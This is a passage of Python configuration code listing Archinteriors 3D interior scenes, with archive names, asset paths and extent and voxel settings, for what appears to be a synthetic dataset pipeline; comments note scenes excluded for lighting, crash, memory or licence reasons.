scenes.append({"name": "ai_023_006", "archive_file": "Archinteriors_23_06.part1.rar", "asset_file": os.path.join("06", "06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_007", "archive_file": "Archinteriors_23_07.rar", "asset_file": os.path.join("07", "07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_008", "archive_file": "Archinteriors_23_08.part1.rar", "asset_file": os.path.join("08", "08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_009", "archive_file": "Archinteriors_23_09.part1.rar", "asset_file": os.path.join("09", "09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_010", "archive_file": "Archinteriors_23_10.part1.rar", "asset_file": os.path.join("10", "10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_001", "archive_file": "Archinteriors24_001.rar", "asset_file": os.path.join("001", "Archinteriors_24_hall_001"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_002", "archive_file": "Archinteriors24_002.rar", "asset_file": os.path.join("002", "Archinteriors_24_hall_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_003", "archive_file": "Archinteriors24_003.rar", "asset_file": os.path.join("003", "Archinteriors_24_hall_003"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_024_004", "archive_file": "Archinteriors24_004.rar", "asset_file": os.path.join("004", "Archinteriors_24_hall_004"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_005", "archive_file": "Archinteriors24_005.rar", "asset_file": os.path.join("005", "Archinteriors_24_hall_005"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_024_006", "archive_file": "Archinteriors24_006.rar", "asset_file": os.path.join("006", "Archinteriors_024_hall_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_007", "archive_file": "Archinteriors24_007.rar", "asset_file": os.path.join("007", "Archinteriors_024_hall_007"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_008", "archive_file": "Archinteriors24_008.rar", "asset_file": os.path.join("008", "Archinteriors_024_hall_08"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_009", "archive_file": "Archinteriors24_009.rar", "asset_file": os.path.join("009", "Archinteriors_024_hall_009"), "normalization_policy": "v0", "scene_extent_meters": 150.0, "voxel_extent_meters": 0.5})
scenes.append({"name": "ai_024_010", "archive_file": "Archinteriors24_010.rar", "asset_file": os.path.join("010", "Archinteriors_24_hall_010_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_011", "archive_file": "Archinteriors24_011.rar", "asset_file": os.path.join("011", "Archinteriors_24_hall_011_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_012", "archive_file": "Archinteriors24_012.rar", "asset_file": os.path.join("012", "Archinteriors_24_hall_012_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_013", "archive_file": "Archinteriors24_013.rar", "asset_file": os.path.join("013", "Archinteriors_24_hall_013_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_014", "archive_file": "Archinteriors24_014.rar", "asset_file": os.path.join("014", "Archinteriors_24_hall_014_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_015", "archive_file": "Archinteriors24_015.rar", "asset_file": os.path.join("015", "Archinteriors_24_hall_015_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_016", "archive_file": "Archinteriors24_016.rar", "asset_file": os.path.join("016", "Archinteriors_24_hall_016_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_017", "archive_file": "Archinteriors24_017.rar", "asset_file": os.path.join("017", "Archinteriors_24_hall_017_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_018", "archive_file": "Archinteriors24_018.rar", "asset_file": os.path.join("018", "Archinteriors_24_hall_018_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_019", "archive_file": "Archinteriors24_019.rar", "asset_file": os.path.join("019", "Archinteriors_24_hall_019_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# slightly bad lighting
# scenes.append({"name": "ai_024_020", "archive_file": "Archinteriors24_020.rar", "asset_file": os.path.join("020", "Archinteriors_24_hall_020_hall"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
# Archinteriors volume 25 is not distributed under the "Royalty Free Licence - All Extended Uses" license, so we exclude it
scenes.append({"name": "ai_026_001", "archive_file": "Archinteriors_26_1.rar", "asset_file": os.path.join("Archinteriors_26_1", "Archinteriors_26_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_002", "archive_file": "Archinteriors_26_2.rar", "asset_file": os.path.join("Archinteriors_26_2", "Archinteriors_26_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_003", "archive_file": "Archinteriors_26_3.rar", "asset_file": os.path.join("Archinteriors_26_3", "Archinteriors_26_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_004", "archive_file": "Archinteriors_26_4.rar", "asset_file": os.path.join("Archinteriors_26_4", "Archinteriors_26_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_005", "archive_file": "Archinteriors_26_5.rar", "asset_file": os.path.join("Archinteriors_26_5", "Archinteriors_26_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_006", "archive_file": "Archinteriors_26_6.rar", "asset_file": os.path.join("Archinteriors_26_6", "Archinteriors_26_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_007", "archive_file": "Archinteriors_26_7.rar", "asset_file": os.path.join("Archinteriors_26_7", "Archinteriors_26_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_008", "archive_file": "Archinteriors_26_8.rar", "asset_file": os.path.join("Archinteriors_26_8", "Archinteriors_26_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_009", "archive_file": "Archinteriors_26_9.rar", "asset_file": os.path.join("Archinteriors_26_9", "Archinteriors_26_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_026_010", "archive_file": "Archinteriors_26_10.rar", "asset_file": os.path.join("Archinteriors_26_10", "Archinteriors_26_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_011", "archive_file": "Archinteriors_26_11.rar", "asset_file": os.path.join("Archinteriors_26_11", "Archinteriors_26_011"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_012", "archive_file": "Archinteriors_26_12.rar", "asset_file": os.path.join("Archinteriors_26_12", "Archinteriors_26_012"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_013", "archive_file": "Archinteriors_26_13.rar", "asset_file": os.path.join("Archinteriors_26_13", "Archinteriors_26_013"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_026_014", "archive_file": "Archinteriors_26_14.rar", "asset_file": os.path.join("Archinteriors_26_14", "Archinteriors_026_014"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_015", "archive_file": "Archinteriors_26_15.rar", "asset_file": os.path.join("Archinteriors_26_15", "Archinteriors_26_015"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_016", "archive_file": "Archinteriors_26_16.rar", "asset_file": os.path.join("Archinteriors_26_16", "Archinteriors_26_16"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_026_017", "archive_file": "Archinteriors_26_17.rar", "asset_file": os.path.join("Archinteriors_26_17", "Archinteriors_26_017"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_018", "archive_file": "Archinteriors_26_18.rar", "asset_file": os.path.join("Archinteriors_26_18", "Archinteriors_26_018"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_019", "archive_file": "Archinteriors_26_19.rar", "asset_file": os.path.join("Archinteriors_26_19", "Archinteriors_26_19"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_020", "archive_file": "Archinteriors_26_20.rar", "asset_file": os.path.join("Archinteriors_26_20", "Archinteriors_26_020"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_001", "archive_file": "Archinteriors_27_001.rar", "asset_file": os.path.join("Archinteriors_27_001", "AI_27_001_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_027_002", "archive_file": "Archinteriors_27_002.rar", "asset_file": os.path.join("Archinteriors_27_002", "AI_027_002_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_003", "archive_file": "Archinteriors_27_003.rar", "asset_file": os.path.join("Archinteriors_27_003", "AI_27_003_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_004", "archive_file": "Archinteriors_27_004.rar", "asset_file": os.path.join("Archinteriors_27_004", "AI_27_004_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_005", "archive_file": "Archinteriors_27_005.rar", "asset_file": os.path.join("Archinteriors_27_005", "AI_27_005_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_006", "archive_file": "Archinteriors_27_006.rar", "asset_file": os.path.join("Archinteriors_27_006", "AI_27_006_cam001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_007", "archive_file": "Archinteriors_27_007.rar", "asset_file": os.path.join("Archinteriors_27_007", "AI_27_07_cam001_cam002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_008", "archive_file": "Archinteriors_27_008.rar", "asset_file": os.path.join("Archinteriors_27_008", "AI_027_008_cam001_cam002_cam004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_009", "archive_file": "Archinteriors_27_009.rar", "asset_file": os.path.join("Archinteriors_27_009", "AI_27_009_cam001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_010", "archive_file": "Archinteriors_27_010.rar", "asset_file": os.path.join("Archinteriors_27_010", "AI_27_10_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_001", "archive_file": "Archinteriors_28_001.rar", "asset_file": os.path.join("01", "AI28_01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_002", "archive_file": "Archinteriors_28_002.rar", "asset_file": os.path.join("02", "AI28_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_003", "archive_file": "Archinteriors_28_003.rar", "asset_file": os.path.join("03", "AI28_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_004", "archive_file": "Archinteriors_28_004.rar", "asset_file": os.path.join("04", "AI28_04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_005", "archive_file": "Archinteriors_28_005.rar", "asset_file": os.path.join("05", "AI28_05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_006", "archive_file": "Archinteriors_28_006.rar", "asset_file": os.path.join("06", "AI28_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# slightly bad lighting
# scenes.append({"name": "ai_028_007", "archive_file": "Archinteriors_28_007.rar", "asset_file": os.path.join("07", "AI28_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_008", "archive_file": "Archinteriors_28_008.rar", "asset_file": os.path.join("08", "AI28_08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_009", "archive_file": "Archinteriors_28_009.rar", "asset_file": os.path.join("09", "AI28_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_010", "archive_file": "Archinteriors_28_010.rar", "asset_file": os.path.join("10", "AI28_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_001", "archive_file": "AI29_Scene_01.rar", "asset_file": os.path.join("Scene_01", "AI29_01_camera_1,2_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_002", "archive_file": "AI29_Scene_02.rar", "asset_file": os.path.join("Scene_02", "AI29_02_camera_1,2,3_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_003", "archive_file": "AI29_Scene_03.rar", "asset_file": os.path.join("Scene_03", "AI29_03_camera_1,2,3_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_004", "archive_file": "AI29_Scene_04.rar", "asset_file": os.path.join("Scene_04", "AI29_04 v2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_005", "archive_file": "AI29_Scene_05.rar", "asset_file": os.path.join("Scene_05", "AI29_05 v2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 30-39
#
scenes.append({"name": "ai_030_001", "archive_file": "AM30_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI30_001_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_002", "archive_file": "AM30_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI30_002_camera_1_2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_003", "archive_file": "AM30_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI30_003_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_004", "archive_file": "AM30_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI30_004_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_005", "archive_file": "AM30_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI30_005_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_030_006", "archive_file": "AM30_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI30_006_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_007", "archive_file": "AM30_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI30_007_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_008", "archive_file": "AM30_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI30_008_camera1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_009", "archive_file": "AM30_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI30_009_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_010", "archive_file": "AM30_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI30_010_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_001", "archive_file": "Archinteriors_31_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI31_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_031_002", "archive_file": "Archinteriors_31_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI31_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_003", "archive_file": "Archinteriors_31_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_004", "archive_file": "Archinteriors_31_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI31_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_005", "archive_file": "Archinteriors_31_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI31_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_006", "archive_file": "Archinteriors_31_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI31_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_007", "archive_file": "Archinteriors_31_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI31_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_008", "archive_file": "Archinteriors_31_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI31_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_009", "archive_file": "Archinteriors_31_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI31_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_010", "archive_file": "Archinteriors_31_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI31_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_001", "archive_file": "Archinteriors_32_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI32_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_002", "archive_file": "Archinteriors_32_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI32_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_003", "archive_file": "Archinteriors_32_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI32_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_004", "archive_file": "Archinteriors_32_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI32_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_005", "archive_file": "Archinteriors_32_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI32_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_032_006", "archive_file": "Archinteriors_32_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI32_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_007", "archive_file": "Archinteriors_32_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI32_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_008", "archive_file": "Archinteriors_32_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AM32_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_009", "archive_file": "Archinteriors_32_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI32_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# runs out of memory when parsing obj
# scenes.append({"name": "ai_032_010", "archive_file": "Archinteriors_32_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI32_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_001", "archive_file": "AI33_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI33_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_002", "archive_file": "AI33_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI33_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_033_003", "archive_file": "AI33_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI33_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_004", "archive_file": "AI33_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI33_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_005", "archive_file": "AI33_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI33_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_033_006", "archive_file": "AI33_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI33_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_007", "archive_file": "AI33_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI33_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_008", "archive_file": "AI33_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI33_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_009", "archive_file": "AI33_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI33_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_010", "archive_file": "AI33_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI33_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_034_001", "archive_file": "AI34_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI34_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_034_002", "archive_file": "AI34_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI34_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_034_003", "archive_file": "AI34_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI34_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_034_004", "archive_file": "AI34_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI34_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_034_005", "archive_file": "AI34_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI34_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_001", "archive_file": "AI35_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI35_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_002", "archive_file": "AI35_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI35_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_003", "archive_file": "AI35_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI35_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_004", "archive_file": "AI35_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI35_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_005", "archive_file": "AI35_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI35_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_006", "archive_file": "AI35_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI35_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_007", "archive_file": "AI35_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI35_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_008", "archive_file": "AI35_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI35_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_009", "archive_file": "AI35_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI35_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_010", "archive_file": "AI35_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI35_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_001", "archive_file": "AI36_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI36_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_002", "archive_file": "AI36_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI36_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_003", "archive_file": "AI36_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI36_003_2011"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_036_004", "archive_file": "AI36_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI36_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_005", "archive_file": "AI36_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI36_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_006", "archive_file": "AI36_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI36_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
